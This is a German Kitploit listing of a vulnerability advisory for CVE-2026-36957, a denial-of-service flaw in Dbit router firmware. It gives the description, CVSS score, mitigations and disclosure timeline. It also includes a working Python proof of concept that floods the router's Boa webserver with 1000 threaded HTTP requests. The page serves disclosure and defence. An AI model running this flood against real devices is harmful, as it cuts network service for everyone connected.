Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-36957 — Proof-of-Concept für CVE-2026-36957, eine Denial-of-Service-Schwachstelle in der Dbit-Router-Firmware über einen HTTP-Flood auf den Boa-Webserver, die Ressourcenerschöpfung und einen Systemabsturz verursacht. | Kitploit
Tools/GitHubGitHub/kirubel-cve/cve-2026-36957
SchwachstellenanalyseExploitationWebsicherheitPenetrationstests
GitHubkirubel-cve/cve-2026-36957

CVE-2026-36957

Proof-of-Concept für CVE-2026-36957, eine Denial-of-Service-Schwachstelle in der Dbit-Router-Firmware über einen HTTP-Flood auf den Boa-Webserver, die Ressourcenerschöpfung und einen Systemabsturz verursacht.

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-36957: Denial of Service durch HTTP-Flood auf dem Boa-Webserver

CVE-ID: CVE-2026-36957 Datum: 2026-04-29 Entdecker: Kirubel Solomne Hersteller: Shenzhen Dibit Network Equipment Co., Ltd. Produkt: Dbit Router Firmware-Version: V1.0.0 CWE: CWE-400 - Unkontrollierte Ressourcennutzung


Beschreibung

Die Firmware V1.0.0 des Dbit Routers ist anfällig für Denial of Service über den URI-Handler des Boa-Webservers. Durch das Senden einer Flut von HTTP-GET-Anfragen an nicht existierende URIs kann ein Angreifer kritische Systemressourcen wie Dateideskriptoren und Speicherpuffer erschöpfen. Dies führt zu einem Kernel-Deadlock oder Systemabsturz, der das Webverwaltungsportal und alle Routing-Funktionen deaktiviert.


CVSS-Score

CVSS v3.1 Score: 7.5 (Hoch) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

MetrikWert
AngriffsvektorNetzwerk
AngriffskomplexitätNiedrig
Erforderliche PrivilegienKeine
BenutzerinteraktionKeine
Auswirkung auf VertraulichkeitKeine
Auswirkung auf IntegritätKeine
Auswirkung auf VerfügbarkeitHoch

Proof of Concept

root@kitploit:~
import requests
import threading

TARGET = "http://192.168.10.1"

def flood(i):
    try:
        requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
    except:
        pass

threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router is still responsive.")

Erwartetes Verhalten: Der Server sollte Verbindungen begrenzen und stabil bleiben. Tatsächliches Verhalten: Die Webschnittstelle des Routers wird nicht mehr erreichbar; ein manueller Neustart ist erforderlich.


Auswirkungen

  • Vollständiger Verlust der Webverwaltungsschnittstelle
  • Unterbrechung aller Routing-Funktionen
  • Manueller Neustart erforderlich, um den Dienst wiederherzustellen
  • Netzwerkausfall für alle angeschlossenen Geräte

Abhilfemaßnahmen

  • Implementierung einer Verbindungsratenbegrenzung auf dem Boa-Webserver
  • Hinzufügen eines Watchdog-Timers zur Wiederherstellung nach Deadlock-Zuständen
  • Begrenzung der maximalen gleichzeitigen Verbindungen pro IP

Offenlegungszeitplan

DatumEreignis
2026-04-29Schwachstelle entdeckt
2026-04-29An MITRE gemeldet
2026-04-29CVE-2026-36957 zugewiesen
2026-04-29Öffentliche Offenlegung

Referenzen

  • MITRE CVE-2026-36957
  • CWE-400
  • Hersteller-Website
Tool herunterladen